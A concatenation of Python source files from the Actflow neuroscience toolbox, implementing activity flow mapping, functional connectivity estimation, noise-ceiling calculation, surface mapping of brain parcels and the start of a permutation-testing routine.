print(scaling_note) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/model_compare/model_compare.py | model_compare.py |
import numpy as np
def actflowcalc(actVect, fcMat, separate_activations_bytarget=False, transfer_func=None):
"""
Function to run activity flow mapping algorithm
actVect: node vector with activation values
fcMat: node x node matrix with connectiivty values
separate_activations_bytarget: indicates if the input actVect matrix has a separate activation vector for each target (to-be-predicted) node (e.g., for the locally-non-circular approach)
transfer_func: The transfer function to apply to the outputs of all source regions. Assumes observed time series are primarily driven by inputs (e.g., local field potentials), such that the source time series need to be converted from inputs to outputs via a transfer function. Default is 'None', which specifies a linear transfer function wherein the output is the same as the input.
"""
numRegions=np.shape(actVect)[0]
actPredVector=np.zeros((numRegions,))
if transfer_func is None:
if separate_activations_bytarget:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
actPredVector[heldOutRegion]=np.sum(actVect[heldOutRegion,otherRegions]*fcMat[heldOutRegion,otherRegions])
else:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
actPredVector[heldOutRegion]=np.sum(actVect[otherRegions]*fcMat[heldOutRegion,otherRegions])
return actPredVector
else:
if separate_activations_bytarget:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
inputActVect=transfer_function(actVect[heldOutRegion,otherRegions],transfer_func=transfer_func)
actPredVector[heldOutRegion]=np.sum(inputActVect*fcMat[heldOutRegion,otherRegions])
else:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
inputActVect=transfer_function(actVect[otherRegions],transfer_func=transfer_func)
actPredVector[heldOutRegion]=np.sum(inputActVect*fcMat[heldOutRegion,otherRegions])
return actPredVector
#Define input transfer function
def transfer_function(activity, transfer_func='linear', threshold=0, a=1):
if transfer_func == 'linear':
return activity
elif transfer_func == 'relu':
return activity*(activity>threshold)
elif transfer_func == 'sigmoid':
return 1 / (1 + np.exp(-activity))
elif transfer_func == 'logit':
return (1/a)*np.log(activity/(1-activity)) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/actflowcomp/actflowcalc.py | actflowcalc.py |
import numpy as np
import scipy.stats
from ..model_compare import *
def noiseceilingcalc(actvect_group_first, actvect_group_second, full_report=False, print_report=True, reliability_type='conditionwise_compthenavgthen', avgthencomp_fixedeffects=False):
"""
Function to calculate the repeat reliability of the data in various ways. This is equivalent to calculating the "noise ceiling" for predictive models (such as encoding models like activity flow models), which identifies theoretical limits on the highest prediction accuracy (based on the assumption that the data predicting itself is the highest possible prediction accuracy).
Note that incorporation of spontaneous activity to predict task-evoked activity might allow for predictions above the noise ceiling (since spontaneous activity is considered "noise" with the noise ceiling approach).
INPUTS
actvect_group_first: node x condition x subject matrix with activation values. This should be distinct data from actvect_group_second (ideally identical in all ways, except a repetition of data collection at a different time)
actvect_group_second: node x condition x subject matrix with activation values. This should be distinct data from actvect_group_first (ideally identical in all ways, except a repetition of data collection at a different time)
full_report: Calculate full report with all reliability types
print_report: Print the reliability report to screen
reliability_type: The kind of reliability to calculate (when full_report=False). Options are:
conditionwise_compthenavgthen - Compare-then-average condition-wise correlation between repetitions. This is run separately for each node, computing the correlation between the activations across conditions (which characterizes each node's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging.
conditionwise_avgthencomp - Average-then-compare condition-wise correlation between repetitions. This is run separately for each node, computing the correlation between the cross-condition activation patterns (which characterizes each node's response profile). Activations are averaged across subjects prior to comparison (sometimes called a "fixed effects" analysis), boosting signal-to-noise ratio but likely reducing dimensionality (through inter-subject averaging) and reducing the ability to assess the consistency of the result across subjects relative to compare-then-average.
nodewise_compthenavg - Compare-then-average cross-node correlation between repetitions (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging (sometimes called a "random effects" analysis).
nodewise_avgthencomp - Average-then-compare cross-node correlation between repetitions (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed after averaging across subjects (sometimes called a "fixed effects" analysis).
[TODO: subjwise_compthenavg (each node & condition based on individual differences)]
OUTPUT
output: a dictionary containing different variables depending on user input for full_report & reliability_type.
See documentation for model_compare function for details.
USAGE EXAMPLES
[TODO: Update usage examples]
import noiseceilingcalc as nc
output = nc.noiseceilingcalc(actvect_group,full_report=False,print_report=True,reliability_type='conditionwise_compthenavgthen')
print('Noise ceiling variables available: ',list(output)) # will show all variables available from this usage of nc; in this case it will contain 2 variables corresponding to conditionwise_compthenavgthen (1 matrix of r values, 1 grand mean r value)
noiseCeilVal = output['repeat_corr_conditionwise_compthenavg_bynode_meanR'] # access the variable containing the grand mean r and assign it to be the noise ceiling metric for this model
import noiseceilingcalc as nc
output = nc.noiseceilingcalc(actvect_group,full_report=True,print_report=True)
print('Noise ceiling variables available: ',list(output)) # will show all variables available from this usage of nc; in this case it will contain all 7 results (because full_report=True)
noiseCeilVal = output['repeat_corr_nodewise_avgthencomp'] # an example of accessing the r value associated with 'nodewise_avgthencomp'
"""
model_compare_output = model_compare(target_actvect=actvect_group_second, model1_actvect=actvect_group_first, model2_actvect=None, full_report=full_report, print_report=print_report, avgthencomp_fixedeffects=avgthencomp_fixedeffects)
return model_compare_output | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/actflowcomp/noiseceilingcalc.py | noiseceilingcalc.py |
from sklearn.linear_model import LinearRegression
from sklearn.decomposition import PCA
from sklearn.model_selection import cross_val_predict
from sklearn.metrics import mean_squared_error, r2_score
import numpy as np
def pc_multregconn(activity_matrix, target_ts=None, n_components=None, n_comp_search=False, n_components_min=1, n_components_max=None):
"""
activity_matrix: Activity matrix should be nodes X time
target_ts: Optional, used when only a single target time series (returns 1 X nnodes matrix)
n_components: Optional. Number of PCA components to use. If None, the smaller of number of nodes or number of time points (minus 1) will be selected.
n_comp_search: Optional. Boolean indicating whether to search for the best number of components based on cross-validation generalization (to reduce overfitting).
n_components_min: Optional. The smallest number to test in the n_comp_search.
n_components_max: Optional. The largest number to test in the n_comp_search.
Output: connectivity_mat (formatted targets X sources), n_components
"""
nnodes = activity_matrix.shape[0]
timepoints = activity_matrix.shape[1]
if n_components == None:
n_components = np.min([nnodes-1, timepoints-1])
else:
if nnodes<n_components or timepoints<n_components:
print('activity_matrix shape: ',np.shape(activity_matrix))
raise Exception('More components than nodes and/or timepoints! Use fewer components')
#De-mean time series
activity_matrix_mean = np.mean(activity_matrix,axis=1)
activity_matrix = activity_matrix - activity_matrix_mean[:, np.newaxis]
if target_ts is None:
#Cross-validation to find optimal number of components (based on mean MSE across all nodes)
if n_comp_search:
if n_components_max is None:
n_components_max = np.min([nnodes-1, timepoints-1])
componentnum_set=np.arange(n_components_min,n_components_max+1)
mse_regionbycomp = np.zeros([np.shape(componentnum_set)[0],nnodes])
for targetnode in range(nnodes):
othernodes = list(range(nnodes))
othernodes.remove(targetnode) # Remove target node from 'other nodes'
X = activity_matrix[othernodes,:].T
y = activity_matrix[targetnode,:]
#Run PCA
pca = PCA()
Xreg_allPCs = pca.fit_transform(X)
mscv_vals=np.zeros(np.shape(componentnum_set)[0])
comp_count=0
for comp_num in componentnum_set:
regr = LinearRegression()
Xreg = Xreg_allPCs[:,:comp_num]
regr.fit(Xreg, y)
# Cross-validation
y_cv = cross_val_predict(regr, Xreg, y, cv=10)
mscv_vals[comp_count] = mean_squared_error(y, y_cv)
comp_count=comp_count+1
mse_regionbycomp[:,targetnode] = mscv_vals
min_comps_means = np.mean(mse_regionbycomp, axis=1)
n_components=componentnum_set[np.where(min_comps_means==np.min(min_comps_means))[0][0]]
print('n_components = ' + str(n_components))
connectivity_mat = np.zeros((nnodes,nnodes))
for targetnode in range(nnodes):
othernodes = list(range(nnodes))
othernodes.remove(targetnode) # Remove target node from 'other nodes'
X = activity_matrix[othernodes,:].T
y = activity_matrix[targetnode,:]
#Run PCA on source time series
pca = PCA(n_components)
reduced_mat = pca.fit_transform(X) # Time X Features
components = pca.components_
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
regrmodel = LinearRegression()
reg = regrmodel.fit(reduced_mat, y)
#Convert regression betas from component space to node space
betasPCR = pca.inverse_transform(reg.coef_)
connectivity_mat[targetnode,othernodes]=betasPCR
else:
#Remove time series mean
target_ts = target_ts - np.mean(target_ts)
#Computing values for a single target node
connectivity_mat = np.zeros((nnodes,1))
X = activity_matrix.T
y = target_ts
#Cross-validation to find optimal number of components
if n_comp_search:
componentnum_set=np.arange(n_components_min,n_components_max+1)
mscv_vals=np.zeros(np.shape(componentnum_set)[0])
comp_count=0
for comp_num in componentnum_set:
mscv_vals[comp_count] = pcr_cvtest(X,y, pc=comp_num, cv=10)
comp_count=comp_count+1
n_components=componentnum_set[np.where(mscv_vals==np.min(mscv_vals))[0][0]]
#Run PCA on source time series
pca = PCA(n_components)
reduced_mat = pca.fit_transform(X) # Time X Features
components = pca.components_
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(reduced_mat, y)
#Convert regression betas from component space to node space
betasPCR = pca.inverse_transform(reg.coef_)
connectivity_mat=betasPCR
return connectivity_mat
def pcr_cvtest(X,y,pc,cv):
''' Principal Component Regression in Python'''
''' Based on code from here: https://nirpyresearch.com/principal-component-regression-python/'''
''' Step 1: PCA on input data'''
# Define the PCA object
pca = PCA()
# Run PCA producing the reduced variable Xred and select the first pc components
Xreg = pca.fit_transform(X)[:,:pc]
''' Step 2: regression on selected principal components'''
# Create linear regression object
regr = LinearRegression()
# Fit
regr.fit(Xreg, y)
# Calibration
#y_c = regr.predict(Xreg)
# Cross-validation
y_cv = cross_val_predict(regr, Xreg, y, cv=cv)
# Calculate mean square error for calibration and cross validation
#mse_c = mean_squared_error(y, y_c)
mse_cv = mean_squared_error(y, y_cv)
#return(y_cv, mse_c, mse_cv)
return(mse_cv) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/pc_multregconn.py | pc_multregconn.py |
from sklearn.linear_model import LinearRegression
#from ..tools import regression
import numpy as np
def multregconn(activity_matrix, target_ts=None):
"""
activity_matrix: Activity matrix should be nodes X time
target_ts: Optional, used when only a single target time series (returns 1 X nnodes matrix)
Output: connectivity_mat, formatted targets X sources
"""
nnodes = activity_matrix.shape[0]
timepoints = activity_matrix.shape[1]
if nnodes > timepoints:
print('activity_matrix shape: ',np.shape(activity_matrix))
raise Exception('More nodes (regressors) than timepoints! Use regularized regression')
if target_ts is None:
connectivity_mat = np.zeros((nnodes,nnodes))
for targetnode in range(nnodes):
othernodes = list(range(nnodes))
othernodes.remove(targetnode) # Remove target node from 'other nodes'
X = activity_matrix[othernodes,:].T
y = activity_matrix[targetnode,:]
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(X, y)
connectivity_mat[targetnode,othernodes]=reg.coef_
# run multiple regression, and add constant
#beta_fc,resids = regression.regression(y,X,alpha=0, constant=True) # increase alpha if want to apply a ridge penalty
#connectivity_mat[targetnode,othernodes] = beta_fc[1:] # exclude 1st coef; first coef is beta_0 (or mean)
else:
#Computing values for a single target node
connectivity_mat = np.zeros((nnodes,1))
X = activity_matrix.T
y = target_ts
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(X, y)
connectivity_mat=reg.coef_
# run multiple regression, and add constant
#beta_fc,resids = regression.regression(y,X,alpha=0, constant=True) # increase alpha if want to apply a ridge penalty
#connectivity_mat = beta_fc[1:] # exclude 1st coef; first coef is beta_0 (or mean)
return connectivity_mat
def logit(x,a=1):
return (1/a)*np.log(x/(1-x)) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/multregconn.py | multregconn.py |
import numpy as np
import nibabel as nib
import h5py
import os
import pkg_resources
dilateMM = 10
partitiondir = pkg_resources.resource_filename('ActflowToolbox.dependencies', 'ColeAnticevicNetPartition/')
defaultdlabelfile = partitiondir + 'CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
dilatedmaskdir = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/CIFTIMasks/')
# maskdir cortex
dilatedmaskdir_cortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'Glasser2016/surfaceMasks/')
# maskdir subcortex
dilatedmaskdir_subcortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/volumeMasks/')
def calcactivity_parcelwise_noncircular_surface(data, dlabelfile=defaultdlabelfile, dilated_parcels=True,subcortex=False, verbose=False):
"""
This function produces a parcel-to-parcel activity (GLM beta) matrix while excluding vertices in the neighborhood of a given target parcel.
Excludes all vertices within a 10mm (default) dilated mask of the target parcel when computing parcel-level mean activity.
Takes in vertex-wise data and generates a parcelA X parcelB activity matrix, with parcelA being the to-be-predicted 'target' and parcelB being the 'source'
Currently only works for surface-based cortex data
PARAMETERS:
data : vertex-wise data... vertices x conditions; default assumes that data is 96k dense array
dlabelfile : parcellation file; each vertex indicates the number corresponding to each parcel. dlabelfile needs to match same vertex dimensions of data
dilated_parcels : If True, will exclude vertices within 10mm of a target parcel's borders when computing mult regression fc (reducing spatial autocorrelation inflation)
subcortex : If True, will include subcortical volume rois from the CAB-NP
verbose : indicate if additional print commands should be used to update user on progress
RETURNS:
activation_matrix : Target X Source activity Matrix. Sources-to-target mappings are organized as rows (targets) from each column (source)
"""
if subcortex is False:
nparcels = 360
else:
nparcels = 718
# Load dlabel file (cifti)
if verbose: print('Loading in CIFTI dlabel file')
dlabels = np.squeeze(nib.load(dlabelfile).get_data())
# Find and sort unique parcels
unique_parcels = np.sort(np.unique(dlabels))
# Only include cortex
unique_parcels = unique_parcels[:nparcels]
# Instantiate empty activation matrix for regular mean time series
regular_activation_matrix = np.zeros((nparcels,data.shape[1]))
regular_activation_computed = np.zeros((nparcels,1))
# Instantiate empty activation matrix
activation_matrix = np.zeros((nparcels,nparcels,data.shape[1]))
for parcelInt,parcel in enumerate(unique_parcels):
# setup cortex/subcortex definitions
if parcelInt < 360:
dilatedmaskdir = dilatedmaskdir_cortex
atlas_label = 'Glasser'
else:
dilatedmaskdir = dilatedmaskdir_subcortex
atlas_label = 'Cabnp'
if verbose: print('Computing activations for target parcel', int(parcel))
# Find where this parcel is in the unique parcel array
parcel_ind = np.where(unique_parcels==parcel)[0]
# Load in mask for target parcel
if dilated_parcels:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir+ atlas_label + 'Parcel' + str(int(parcel)) + '_dilated_10mm.dscalar.nii').get_data())
else:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir+ atlas_label + 'Parcel' + str(int(parcel)) + '.dscalar.nii').get_data())
# get all target ROI indices
target_ind = np.where(dlabels==parcel)[0] # Find target parcel indices (from dlabel file)
#target_ind = np.squeeze(nib.load(dilatedmaskdir+'GlasserParcel' + str(int(parcel)) + '.dscalar.nii').get_data())
#target_ind = np.asarray(target_ind,dtype=bool)
# remove target parcel's (potentially dilated) mask from set of possible source vertices
mask_ind = np.where(parcel_mask==1.0)[0] # find mask indices
source_indices = dlabels.copy() # copy the original parcellation dlabel file
source_indices[mask_ind] = 0 # modify original dlabel file to remove any vertices that are in the mask
# Identify all 'source' parcels to include when computing FC
source_parcels = np.delete(unique_parcels, parcel_ind)
# Now compute mean activations of each ROI using modified dlabel file after removing target parcel's mask (ie source_indices)
source_parcel_ts = np.zeros((len(source_parcels),data.shape[1])) # source regions X time matrix
empty_source_row = [] # empty array to keep track of the row index of any sources that might be excluced
i = 0
for source in source_parcels:
source_ind = np.where(source_indices==source)[0] # Find source parcel indices (from modified dlabel file)
sourceInt = np.where(unique_parcels==source)[0]
#Determine if this source parcel was modified (if not, then use standard time series)
source_ind_orig = np.where(dlabels==source)[0]
if np.array_equal(source_ind,source_ind_orig):
if regular_activation_computed[sourceInt]:
source_parcel_ts[i,:] = regular_activation_matrix[sourceInt,:]
else:
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
#Save time series for future use
regular_activation_matrix[sourceInt,:] = source_parcel_ts[i,:].copy()
regular_activation_computed[sourceInt] = True
else:
# If the entire parcel is excluded (i.e, the time series is all 0s), then skip computing the mean for this parcel
if len(source_ind)==0:
empty_source_row.append(i) # if this source is empty, remember its row (to delete it from the regressor matrix later)
i += 1
# Go to next source parcel
continue
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
i += 1
# Delete source regions that have been entirely excluded from the source_parcels due to the dilation
if len(empty_source_row)>0:
source_parcel_ts = np.delete(source_parcel_ts,empty_source_row,axis=0) # delete all ROIs with all 0s
source_parcels = np.delete(source_parcels,empty_source_row,axis=0) # Delete the 0-variance ROI from the list of sources
# compute averaged time series of TARGET
if regular_activation_computed[parcelInt]:
target_parcel_ts = regular_activation_matrix[parcelInt,:]
else:
target_parcel_ts = np.nanmean(np.real(data[target_ind,:]),axis=0)
#Save time series for future use
regular_activation_matrix[parcelInt,:] = target_parcel_ts.copy()
regular_activation_computed[parcelInt] = True
# Find matrix indices for all source parcels
source_cols = np.where(np.in1d(unique_parcels,source_parcels))[0]
target_row = parcelInt
activation_matrix[target_row,source_cols,:] = source_parcel_ts
activation_matrix[target_row,target_row,:] = target_parcel_ts
return activation_matrix | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/calcactivity_parcelwise_noncircular_surface.py | calcactivity_parcelwise_noncircular_surface.py |
from scipy import linalg
from sklearn.covariance import EmpiricalCovariance,LedoitWolf
import numpy as np
def partial_corrconn(activity_matrix,estimator='EmpiricalCovariance', target_ts=None):
"""
activity_matrix: Activity matrix should be nodes X time
target_ts: Optional, used when only a single target time series (returns 1 X nnodes matrix)
estimator: can be either 'Empirical covariance' the default, or 'LedoitWolf' partial correlation with Ledoit-Wolf shrinkage
Output: connectivity_mat, formatted targets X sources
Credit goes to nilearn connectivity_matrices.py which contains code that was simplified for this use.
"""
nnodes = activity_matrix.shape[0]
timepoints = activity_matrix.shape[1]
if nnodes > timepoints:
print('activity_matrix shape: ',np.shape(activity_matrix))
raise Exception('More nodes (regressors) than timepoints! Use regularized regression')
if 2*nnodes > timepoints:
print('activity_matrix shape: ',np.shape(activity_matrix))
print('Consider using a shrinkage method')
if target_ts is None:
connectivity_mat = np.zeros((nnodes,nnodes))
# calculate covariance
if estimator is 'LedoitWolf':
cov_estimator = LedoitWolf(store_precision=False)
elif estimator is 'EmpiricalCovariance':
cov_estimator = EmpiricalCovariance(store_precision=False)
covariance = cov_estimator.fit(activity_matrix.T).covariance_
# calculate precision
precision = linalg.inv(covariance)
# precision to partial corr
diagonal = np.atleast_2d(1. / np.sqrt(np.diag(precision)))
correlation = precision * diagonal * diagonal.T
# Force exact 0. on diagonal
np.fill_diagonal(correlation, 0.)
connectivity_mat = -correlation
else:
#Computing values for a single target node
connectivity_mat = np.zeros((nnodes,1))
X = activity_matrix.T
y = target_ts
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(X, y)
connectivity_mat=reg.coef_
return connectivity_mat | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/partial_corrconn.py | partial_corrconn.py |
import numpy as np
import nibabel as nib
import h5py
import os
import pkg_resources
from .multregconn import *
from .corrcoefconn import *
from .pc_multregconn import *
dilateMM = 10
partitiondir = pkg_resources.resource_filename('ActflowToolbox.dependencies', 'ColeAnticevicNetPartition/')
defaultdlabelfile = partitiondir + 'CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
# maskdir cortex
dilatedmaskdir_cortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'Glasser2016/surfaceMasks/')
# maskdir subcortex
dilatedmaskdir_subcortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/volumeMasks/')
def calcconn_parcelwise_noncircular_surface(data, connmethod='multreg', dlabelfile=defaultdlabelfile, dilated_parcels=True, precomputedRegularTS=None, subcortex=False, verbose=False):
"""
This function produces a parcel-to-parcel connectivity matrix while excluding vertices in the neighborhood of a given target parcel.
Excludes all vertices within a 10mm (default) dilated mask of the target parcel when computing parcel-to-parcel connectivity.
Takes in vertex-wise data and generates a parcel X parcel connectivity matrix based on provided connmethod
Currently only works for surface-based cortex connectivity
PARAMETERS:
data : vertex-wise data... vertices x time; default assumes that data is 96k dense array
connmethod : a string indicating what connectivity method to use. Options: 'multreg' (default), 'pearsoncorr', 'pc_multregconn'
dlabelfile : parcellation file; each vertex indicates the number corresponding to each parcel. dlabelfile needs to match same vertex dimensions of data
dilated_parcels : If True, will exclude vertices within 10mm of a target parcel's borders when computing mult regression fc (reducing spatial autocorrelation inflation)
precomputedRegularTS: optional input of precomputed 'regular' mean time series with original region set. This might cut down on computation time if provided.
subcortex : If True, will include subcortical volume rois from the CAB-NP
verbose : indicate if additional print commands should be used to update user on progress
RETURNS:
fc_matrix : Target X Source FC Matrix. Sources-to-target mappings are organized as rows (targets) from each column (source)
"""
if subcortex is False:
nparcels = 360
else:
nparcels = 718
# Load dlabel file (cifti)
if verbose: print('Loading in CIFTI dlabel file')
dlabels = np.squeeze(nib.load(dlabelfile).get_data())
# Find and sort unique parcels
unique_parcels = np.sort(np.unique(dlabels))
# Only include cortex (if flagged)
unique_parcels = unique_parcels[:nparcels]
# Instantiate empty time series matrix for regular mean time series, or load from memory if provided
if precomputedRegularTS is not None:
regular_ts_matrix = precomputedRegularTS
regular_ts_computed = np.ones((nparcels,1),dtype=bool)
else:
regular_ts_matrix = np.zeros((nparcels,data.shape[1]))
regular_ts_computed = np.zeros((nparcels,1))
# Instantiate empty fc matrix
fc_matrix = np.zeros((nparcels,nparcels))
for parcelInt,parcel in enumerate(unique_parcels):
if verbose: print('Computing FC for target parcel',parcelInt,'-',int(parcel),'/',len(unique_parcels))
# setup cortex/subcortex definitions
if parcelInt < 360:
dilatedmaskdir = dilatedmaskdir_cortex
atlas_label = 'Glasser'
else:
dilatedmaskdir = dilatedmaskdir_subcortex
atlas_label = 'Cabnp'
# Find where this parcel is in the unique parcel array
parcel_ind = np.where(unique_parcels==parcel)[0]
# Load in mask for target parcel
if dilated_parcels:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir + atlas_label + 'Parcel' + str(int(parcel)) + '_dilated_10mm.dscalar.nii').get_data())
else:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir + atlas_label + 'Parcel' + str(int(parcel)) + '.dscalar.nii').get_data())
# get all target ROI indices
target_ind = np.squeeze(nib.load(dilatedmaskdir + atlas_label + 'Parcel' + str(int(parcel)) + '.dscalar.nii').get_data())
target_ind = np.asarray(target_ind,dtype=bool)
if verbose: print('\t size of target:', np.sum(target_ind))
# remove target parcel's mask from set of possible source vertices
mask_ind = np.where(parcel_mask==1.0)[0] # find mask indices
source_indices = dlabels.copy() # copy the original parcellation dlabel file
source_indices[mask_ind] = 0 # modify original dlabel file to remove any vertices that are in the mask
# Identify all 'source' parcels to include when computing FC
source_parcels = np.delete(unique_parcels, parcel_ind)
# Now compute mean time series of each ROI using modified dlabel file after removing target parcel's mask (ie source_indices)
source_parcel_ts = np.zeros((len(source_parcels),data.shape[1])) # source regions X time matrix
empty_source_row = [] # empty array to keep track of the row index of any sources that might be excluced
i = 0
for source in source_parcels:
source_ind = np.where(source_indices==source)[0] # Find source parcel indices (from modified dlabel file)
sourceInt = np.where(unique_parcels==source)[0]
#Determine if this source parcel was modified (if not, then use standard time series)
source_ind_orig = np.where(dlabels==source)[0]
if np.array_equal(source_ind,source_ind_orig):
if regular_ts_computed[sourceInt]:
source_parcel_ts[i,:] = regular_ts_matrix[sourceInt,:]
else:
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
#Save time series for future use
regular_ts_matrix[sourceInt,:] = source_parcel_ts[i,:].copy()
regular_ts_computed[sourceInt] = True
else:
# If the entire parcel is excluded (i.e, the time series is all 0s), then skip computing the mean for this parcel
if len(source_ind)==0:
empty_source_row.append(i) # if this source is empty, remember its row (to delete it from the regressor matrix later)
i += 1
# Go to next source parcel
continue
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
i += 1
# Delete source regions that have been entirely excluded from the source_parcels due to the dilation
if len(empty_source_row)>0:
source_parcel_ts = np.delete(source_parcel_ts,empty_source_row,axis=0) # delete all ROIs with all 0s from regressor matrix
source_parcels = np.delete(source_parcels,empty_source_row,axis=0) # Delete the 0-variance ROI from the list of sources
# compute averaged time series of TARGET
if regular_ts_computed[parcelInt]:
target_parcel_ts = regular_ts_matrix[parcelInt,:]
else:
target_parcel_ts = np.mean(np.real(data[target_ind,:]),axis=0)
#Save time series for future use
regular_ts_matrix[parcelInt,:] = target_parcel_ts.copy()
regular_ts_computed[parcelInt] = True
# Find matrix indices for all source parcels
source_cols = np.where(np.in1d(unique_parcels,source_parcels))[0]
target_row = parcelInt
if connmethod == 'multreg':
# run multiple regression, and add constant
fc_matrix[target_row,source_cols] = multregconn(source_parcel_ts,target_parcel_ts)
elif connmethod == 'pearsoncorr':
fc_matrix[target_row,source_cols] = corrcoefconn(source_parcel_ts,target_parcel_ts)
elif connmethod == 'pc_multregconn':
fc_matrix[target_row,source_cols] = pc_multregconn(source_parcel_ts,target_parcel_ts)
return fc_matrix | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/calcconn_parcelwise_noncircular_surface.py | calcconn_parcelwise_noncircular_surface.py |
import numpy as np
import nibabel as nib
import os
import pkg_resources
#import subprocess
#toolsdir = pkg_resources.resource_filename('ActflowToolbox.tools', '/')
#glasserfile2=toolsdir+'Q1-Q6_RelatedParcellation210.LR.CorticalAreas_dil_Colors.32k_fs_RL.dlabel.nii'
dependenciesdir = pkg_resources.resource_filename('ActflowToolbox.dependencies', '/')
glasserfile2=dependenciesdir+'ColeAnticevicNetPartition/CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
def map_to_surface(mat,filename,nParcels=360,glasserfile2=glasserfile2,fliphemispheres=False):
"""
Maps a region X column 2d matrix into a dscalar file with 64k vertices
Uses the Glasser et al. 2016 ROI parcellation
Input Parameters:
mat : region x column (features/activations, etc.) 2D MATRIX to be mapped onto the surface. MUST BE A 2D MATRIX.
mat can either be 360 mat or ~59k mat. If 360, will automatically map back to ~59k
filename: a string indicating the directory + filename of the output. Do not include a suffix (e.g., ".dscalar.nii" to the file. Suffixes will be added automatically.
fliphemispheres: If the data were originally loaded using RL (right hemisphere then left) convention the data should be
flipped, since CAB-NP uses LR (left hemisphere then right). A setting of True will flip the hemispheres.
"""
if fliphemispheres:
print('Flipping hemispheres')
newmat=np.zeros(mat.shape)
newmat[0:180]=mat[180:360]
newmat[180:360]=mat[0:180]
mat=newmat.copy()
#### Load glasser atlas
glasser2 = nib.load(glasserfile2).get_data()
glasser2 = np.squeeze(glasser2)
#### Map back to surface
if mat.shape[0]==nParcels:
out_mat = np.zeros((glasser2.shape[0],mat.shape[1]))
for roi in np.arange(nParcels):
vertex_ind = np.where(glasser2==roi+1)[0]
for col in range(mat.shape[1]):
out_mat[vertex_ind,col] = mat[roi,col]
else:
out_mat = mat
####
# Write file to csv and run wb_command
np.savetxt(filename + '.csv', out_mat,fmt='%s')
wb_file = filename + '.dscalar.nii'
wb_command = 'wb_command -cifti-convert -from-text ' + filename + '.csv ' + glasserfile2 + ' ' + wb_file + ' -reset-scalars'
#os.system(wb_command)
print('Command:')
print(wb_command)
try:
#subprocess.call(wb_command)
os.system(wb_command)
os.remove(filename + '.csv')
print("CIFTI dscalar is output as:" + wb_file)
except OSError:
print ('wb_command does not exist') | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/tools/map_to_surface.py | map_to_surface.py |
# Code to perform permutation testing to control for family-wise error (FWE)
# Using max-T approach as described in Nichols & Holmes (2002)
# Nichols TE, Holmes AP. (2002). Nonparametric permutation tests for functional neuroimaging: A primer with Examples. Hum. Brain Mapp., 15: 1-25. doi:10.1002/hbm.1058
import numpy as np
import scipy.stats as stats
import multiprocessing as mp
from statsmodels.distributions.empirical_distribution import ECDF
###
# max_r approach (for, e.g., individual difference correlations)
def max_r(data_arr, behav_arr, alpha=.05, tail=2, permutations=1000, nproc=1, pvals=False):
"""
Performs family-wise error correction using permutation testing (Nichols & Holmes 2002)
Using correlations as test-statistic (as opposed to T-Stat. Can be used for RSA type analysis or individual difference correlations.
Note! Assumes a two-tailed test (specify tail of test by tail parameter)
Citation:
Nichols TE, Holmes AP. (2002). Nonparametric permutation tests for functional neuroimaging: A primer with Examples. Hum. Brain Mapp., 15: 1-25. doi:10.1002/hbm.1058
Required Parameters:
data_arr = MxN matrix of set of M independent measurements (e.g., FC-values) across N subjects
behav_arr = Nx1 array of behavioral measures for N subjects
Optional Parameters:
alpha = alpha value to return the maxT threshold {default = .05}
tail = [0,1, or -1]
If tail = 1, reject the null hypothesis if the correlation is greater than the null dist (upper tailed test).
If tail = -1, reject the null hypothesis if the correlation is less than the null dist (lower tailed test).
If tail = 2, reject the null hypothesis for a two-tailed test
{default : 2}
permutations = Number of permutations to perform {default = 1000}
nproc = number of processes to run in parallel {default = 1}
pvals = if True, returns equivalent p-value distribution for all t-values {default = True}
Returns:
r : Array of Pearson-r values of the true correlations map (Mx1 vector, for M tests)
maxRThreshold : The Pearson-r value corresponding to the corrected alpha value. If a two-tailed test is specified, the absolute value of the maxR threshold is provided.
